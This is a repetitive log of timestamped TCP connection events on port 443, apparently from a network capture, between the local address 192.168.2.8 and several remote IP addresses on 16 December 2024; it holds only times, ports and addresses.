                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.120893002 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.121330023 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.121340990 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123114109 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123120070 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123236895 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123254061 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123259068 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123262882 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123348951 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123374939 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123549938 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123583078 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123694897 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123716116 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123732090 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123737097 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123816967 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.123835087 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.130101919 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.131611109 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.206758976 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.206785917 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.209523916 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.209528923 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.907269955 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.907336950 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.907361031 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.907381058 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.907427073 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.955739975 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:09.955804110 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.159629107 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.159717083 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.159723043 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.159761906 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.165204048 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:10.165232897 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.382298946 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.382342100 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.385571003 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.386852980 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.386862993 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.305077076 CET49763443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.305125952 CET44349763172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.305179119 CET49763443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.309426069 CET49763443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.309446096 CET44349763172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.591485977 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.591525078 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.591582060 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.591845036 CET49768443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.591855049 CET44349768116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.798310041 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.802159071 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.822801113 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.822808027 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.825028896 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.825032949 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.825072050 CET49759443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.825078011 CET44349759116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.843751907 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.843802929 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.843878984 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.844053984 CET49769443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.844067097 CET44349769172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.848790884 CET49770443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.848814011 CET44349770172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.850152969 CET49770443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.850438118 CET49770443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.850444078 CET44349770172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.447228909 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.447243929 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.447473049 CET49773443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.447487116 CET44349773172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.448328972 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.448398113 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.449259996 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.449346066 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.449474096 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.449479103 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.487334967 CET44349782172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.610254049 CET49782443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.610254049 CET49773443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.610272884 CET44349782172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.634347916 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.634426117 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.634485960 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.634758949 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.634773016 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.659341097 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.659399986 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.761317015 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.761482954 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.761490107 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.762434959 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.762489080 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.762805939 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.762856007 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.762906075 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.807333946 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.814404011 CET49782443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.877445936 CET44349782172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.877635002 CET44349782172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.877701044 CET49782443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.877737999 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.877811909 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.878148079 CET49782443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.878165960 CET44349782172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.895826101 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.898940086 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.898982048 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.899879932 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900149107 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900194883 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900219917 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900221109 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900759935 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.900827885 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.901094913 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.901108980 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.905035973 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.905122995 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.905663967 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.905785084 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.905862093 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.911777020 CET44349773172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.911849976 CET44349773172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.911900997 CET49773443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.912533045 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.912708044 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.912950993 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.915443897 CET49773443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.915461063 CET44349773172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.915872097 CET49783443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.915896893 CET44349783172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.956204891 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.956399918 CET44349785172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.956460953 CET49785443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.961174011 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.961186886 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.985994101 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.096765995 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.104433060 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.104643106 CET44349787172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.104721069 CET49787443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.126945019 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.127358913 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.127424955 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.127902985 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128006935 CET44349786172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128066063 CET49786443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128092051 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128148079 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128165007 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128206968 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.128927946 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.080310106 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.093772888 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.094141006 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.094158888 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107515097 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107650995 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.107670069 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120704889 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120850086 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.120871067 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132159948 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132384062 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.132405043 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144121885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144284964 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.144304991 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156335115 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156728029 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.156755924 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.167922020 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.168231964 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.168251991 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.193923950 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.194093943 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.194155931 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196278095 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196552992 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.196569920 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204108000 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204528093 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.204547882 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.211551905 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.212045908 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.212105989 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.219541073 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.220868111 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.220896006 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227178097 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227746010 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227762938 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234735966 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234939098 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.234957933 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242274046 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242738008 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.242800951 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.250755072 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.251247883 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.251270056 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257543087 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257916927 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.257935047 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265422106 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265930891 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.265961885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.274246931 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.278430939 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.278456926 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.280200958 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282433987 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282454967 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288018942 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288249016 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.288275957 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296042919 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296411037 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.296432018 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.303145885 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310131073 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310148954 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.310970068 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.311028004 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.311034918 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.318380117 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.322298050 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.322313070 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.326625109 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.330189943 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.330218077 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.334196091 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.338212013 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.338227034 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.346071959 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348284006 CET44349775172.217.19.225192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.348315001 CET49775443192.168.2.8172.217.19.225
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074022055 CET49793443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074208975 CET49794443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.074219942 CET49795443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.249967098 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.250201941 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.250240088 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.251261950 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.251357079 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252449036 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252840042 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252918005 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253021002 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253037930 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253577948 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253894091 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253972054 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257477045 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257525921 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257590055 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257796049 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257808924 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300653934 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300652981 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300671101 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.361646891 CET49796443192.168.2.8172.64.41.3
